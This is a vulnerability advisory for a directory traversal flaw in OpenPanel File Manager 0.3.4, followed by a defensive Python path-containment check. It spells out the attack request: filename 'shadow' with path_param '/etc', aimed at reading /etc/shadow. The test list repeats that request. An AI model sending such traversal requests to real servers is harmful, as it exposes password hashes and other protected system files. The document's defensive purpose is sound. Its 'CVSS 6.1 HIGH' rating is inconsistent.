Vendor: File Manager
By: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee
CVSS: 6.1 HIGH
Directory Traversal
CWE: 22
Product Name: File Manager
Affected Version From: 0.3.4
Affected Version To: 0.3.4
Patch Exists: NO
Related CVE: CVE-2024-53582
CPE: openpanel_file_manager:0.3.4
Platforms Tested: macOS
2024
OpenPanel File Manager 0.3.4 – Directory Traversal Vulnerability
OpenPanel File Manager version 0.3.4 is vulnerable to directory traversal. By sending a crafted GET request to view_file with the filename parameter set to 'shadow' and path_param set to '/etc', an attacker can access sensitive system files outside the intended directory. This vulnerability has been assigned CVE-2024-53582.
Mitigation:
To mitigate this vulnerability, it is recommended to update to a patched version of the software as soon as one becomes available. Additionally, access to the File Manager should be restricted to authorized users only.
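Until a patched version exists, the missing control is a containment check on the resolved path. The sketch below is an added example, not OpenPanel's code: resolve_naive shows a traversal-prone join (an assumed pattern, not the project's actual implementation), resolve_contained shows the hardened form, and the base directory and function names are hypothetical. It goes beyond the advisory's single request by also covering parent-directory segments and a symlink inside the served directory.

```python
import os
import tempfile


class PathOutsideBase(Exception):
    """The request resolves outside the directory the file manager serves."""


def resolve_naive(base_dir, path_param, filename):
    # Traversal-prone pattern: an absolute path_param makes os.path.join
    # drop base_dir entirely, and ".." segments are passed through.
    return os.path.join(base_dir, path_param, filename)


def resolve_contained(base_dir, path_param, filename):
    base = os.path.realpath(base_dir)
    # filename must be one plain component, never a path of its own.
    if filename in ("", ".", "..") or os.path.basename(filename) != filename:
        raise PathOutsideBase(filename)
    # Canonicalise (collapses "..", follows symlinks), then check containment.
    candidate = os.path.realpath(os.path.join(base, path_param, filename))
    if os.path.commonpath([base, candidate]) != base:
        raise PathOutsideBase(candidate)
    return candidate


def demo():
    # Constructed requests; the second is the one described in the advisory.
    requests = [
        ("docs", "report.txt"),
        ("/etc", "shadow"),
        ("../..", "shadow"),
        ("link", "shadow"),  # symlink inside the base pointing at /etc
    ]
    verdicts = []
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "files")  # hypothetical served directory
        os.makedirs(os.path.join(base, "docs"))
        os.symlink("/etc", os.path.join(base, "link"))
        for path_param, filename in requests:
            try:
                resolve_contained(base, path_param, filename)
                verdicts.append("allowed")
            except PathOutsideBase:
                verdicts.append("blocked")
    return verdicts


if __name__ == "__main__":
    print(demo())
```

The check compares canonical paths rather than raw strings, so it holds regardless of how the request encodes the location.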